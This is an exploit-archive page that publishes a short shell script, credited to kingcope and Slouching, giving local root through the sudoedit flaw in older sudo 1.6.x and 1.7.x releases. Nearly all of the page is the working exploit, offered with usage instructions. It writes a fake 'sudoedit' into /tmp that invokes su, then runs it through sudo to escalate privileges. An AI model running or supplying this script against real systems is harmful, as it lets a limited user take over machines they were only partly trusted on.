[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# Published : 2010-03-07
# Author : kingcope
# Previous Title : Yahoo Player v1.0 (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)
# Next Title : Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1